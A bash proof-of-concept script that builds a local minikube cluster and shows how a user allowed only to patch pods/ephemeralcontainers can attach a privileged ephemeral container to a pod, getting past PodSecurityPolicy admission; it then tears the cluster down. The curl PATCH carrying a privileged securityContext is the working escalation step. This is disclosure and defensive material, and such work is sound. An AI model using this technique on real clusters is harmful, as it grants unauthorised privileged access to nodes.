Small PoC demonstrating the problem of not filtering the creation of ephemeral containers at the admission-control level; it depends on minikube, kubectl and curl.
#!/bin/bash
# Abort on the first failing command and let a failing stage fail its whole pipeline,
# so a broken setup step never lets the later steps run against a half-built cluster.
set -eo pipefail
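# Print a section heading to stdout: a blank line, then "[+] " and the message.
# $1 - the message. It is passed as a printf argument rather than as the format
#      string, so '%' characters (or anything else) in it are printed literally.
print() {
  printf '\n[+] %s\n' "$1"
}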
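# Run a command line repeatedly until it succeeds, sleeping between attempts.
# $1 - command line. It is evaluated with eval in the current shell, so only
#      ever pass literals written in this script, never data taken from the
#      environment, a file or a remote response.
# $2 - maximum number of attempts (default 60)
# $3 - seconds to sleep between attempts (default 1)
# Returns 0 as soon as the command succeeds, 1 when every attempt failed.
retry_for_command_success() {
  local cmd=$1
  local max_attempts=${2:-60}
  local delay=${3:-1}
  local attempt=0
  until (( attempt >= max_attempts )); do
    # eval is kept so existing callers that pass one quoted string keep working.
    if eval "$cmd"; then
      return 0
    fi
    attempt=$((attempt + 1))
    sleep "$delay"
  done
  return 1
}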
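# Kubernetes release the demo cluster runs; the PodSecurityPolicy admission
# plugin enabled below has to exist in it (PSP was removed in later releases,
# so confirm before bumping this).
readonly KUBERNETES_VERSION="v1.24.1"

# Create a single-node minikube cluster with the PSP admission plugin turned on
# and the pod-security-policy addon installed.
minikube start \
  --kubernetes-version="$KUBERNETES_VERSION" \
  --extra-config=apiserver.enable-admission-plugins=PodSecurityPolicy \
  --addons=pod-security-policy
print "Checking that PSP are enabled"
kubectl get psp
# The default serviceaccount appears once the controllers are up; poll for it
# rather than racing the cluster with the pod creation that follows.
print "Waiting for the cluster to be ready, i.e. the default serviceaccount to be created"
retry_for_command_success "kubectl -n default get serviceaccount default -o name"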
# Workload that the low-privileged principal will later attach an ephemeral
# container to; created with the current (admin) kubeconfig context.
print "Creating a regular nginx pod with admin cred"
kubectl run nginx --image=nginx
# Minimal RBAC for the demo principal: the only verb granted is patch on the
# pods/ephemeralcontainers subresource. This is the permission a defender has
# to treat as equivalent to creating a pod in that namespace, because the
# PATCH sent later carries its own securityContext.
# NOTE(review): the rolebinding targets a *user* named fake-user, which is also
# what --as=fake-user impersonates below; the serviceaccount of the same name
# is not the impersonated identity (that would be
# system:serviceaccount:default:fake-user) — confirm whether it is needed.
print "Creating a fake user with only patch on pods/ephemeralcontainers"
kubectl create serviceaccount fake-user
kubectl create role fake-debugger --verb=patch --resource=pods/ephemeralcontainers
kubectl create rolebinding fake-debugger-binding --role=fake-debugger --user=fake-user
# Shows what the impersonated principal can do, so the reader can compare it
# with what the PATCH below achieves.
print "Listing fake user rights"
kubectl --as=fake-user auth can-i --list
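print "Opening API proxy as fake user"
# Local proxy to the API server that adds impersonation headers for fake-user
# to every request. No --port is given, so it listens on kubectl's default
# port 8001, which the curl command further down relies on.
kubectl proxy --as=fake-user &
proxy_pid=$!
# Stop the background proxy on interruption, termination or normal exit.
# Single-quoted so the pid is read when the trap fires; a kill failing because
# the proxy is already gone is best-effort cleanup and must not mask the
# script's own exit status.
trap 'kill "$proxy_pid" 2>/dev/null || true' SIGINT SIGTERM EXIT
print "Sleeping for a few seconds for the proxy to open"
# NOTE(review): a fixed delay races proxy start-up; polling the proxy port
# with retry_for_command_success would be more robust on slow machines.
sleep 3
print "Waiting for the nginx pod to be ready"
kubectl wait --for=condition=Ready pod/nginx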
print "Sending the patch for the privileged ephemeral container as the fake user"
# Strategic-merge patch on the ephemeralcontainers subresource, sent through
# the impersonating proxy. The request itself carries the securityContext; the
# only permission exercised is the patch verb granted above.
curl localhost:8001/api/v1/namespaces/default/pods/nginx/ephemeralcontainers \
  --request PATCH \
  --header 'Content-Type: application/strategic-merge-patch+json' \
  --data '
{
  "spec":
  {
    "ephemeralContainers":
    [
      {
        "name": "debugger",
        "command": ["kdigger", "dig", "cap"],
        "image": "nixery.dev/kdigger",
        "targetContainerName": "nginx",
        "securityContext": {
          "privileged": true
        },
        "stdin": true,
        "tty": true
      }
    ]
  }
}'
# The API response carries no trailing newline; end the line before the next heading.
printf '\n'
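print "Trying to get the logs from the privileged debug container to verify that it is privileged. Wait until the container image is downloaded and the container is done!"
# The retry may exhaust its budget (slow image pull, or the patch was rejected).
# Capture that status instead of letting set -e abort here, so the cluster is
# still torn down below; the status is re-raised after cleanup.
rv=0
retry_for_command_success "kubectl logs nginx -c debugger" || rv=$?
print "Removing the minikube cluster, you can use \"minikube delete --purge\" to remove everything in the ~/.minikube folder or just delete that folder."
minikube delete
exit "$rv"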